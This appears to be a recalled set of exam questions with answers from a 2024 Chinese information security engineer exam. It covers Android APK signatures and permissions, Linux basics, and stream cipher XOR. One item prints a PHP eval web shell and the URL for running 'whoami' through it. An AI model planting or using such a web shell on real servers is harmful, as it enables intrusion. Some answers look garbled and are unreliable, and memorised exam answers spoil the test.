
2024年信息安全工程师、2024InformationSecurityEngineer
2024 Information Security Engineer, 2024InformationSecurityEngineer
Soft Exam - Exam Date: 2024年11月08日
Directory/file storing the signature ___ (2 points) Answer: META-INF
Directory/file storing permissions ___ (2 points) Answer: AndroidManifest.xml
Five questions (10 points) (1) Which setting supports backup; (2) Historical location information can be read; are there any security risks; (3) In the configuration file, which of the four major components are used; (4) Which component has the highest risk of information leakage; (5) Is there information abuse? Explain in detail;
Answer: (1) backup...... Backup is not supported (2) There are hidden risks; unknown information may be leaked (3) Activity, BroadcastRecevier (4) Contentprovider (5) There is information abuse. Permissions such as location, camera, storage, contacts, multimedia, and Bluetooth are mostly over-collected
Does the user in Android have root privileges (2 points) Answer: No
Full name of ll ___ (2 points) Answer: ls -l
Is the current user root or a regular user ___ (2 points) Answer: root
Numeric representation of file permissions ___ (2 points) Answer: rw-r--r-- 644
What does ../ in the figure mean ___ (2 points) Answer: Parent directory, /var/www/html
Linux built-in commands for calculating hash values ___ (2 points) md5sum; sha1sum; shasum -a 256
shell.php <?php @eval($_GET["cmd"]); ?> (5 points)
- What is the connection password corresponding to this file? Answer: cmd
- What HTTP request method is used? Answer: GET
- Assuming the domain is abc.com, the complete request URL for executing whoami Answer: abc.com/shell.php?cmd=system("whoami")
- Besides symmetric and asymmetric encryption, how else can encryption be classified by the way plaintext is processed (2 points) Answer: Block ciphers and stream ciphers
- The 8-bit representation of a (2 points) Answer: 97 ---》 01100001
- Result of XOR encryption of a and abc (6 points) Answer: 032 or 00000000 00000011 00000010
- Given mi, ki, ci, what is the formula to obtain the plaintext (2 points) Answer: mi = ki XOR ^ ci
- Is it secure for two different plaintexts to be encrypted with the same stream cipher key? Why? (2 points) Answer: Not secure; one plaintext can be derived from the other
- Can a block cipher be used as a stream cipher (1 point) Answer: Yes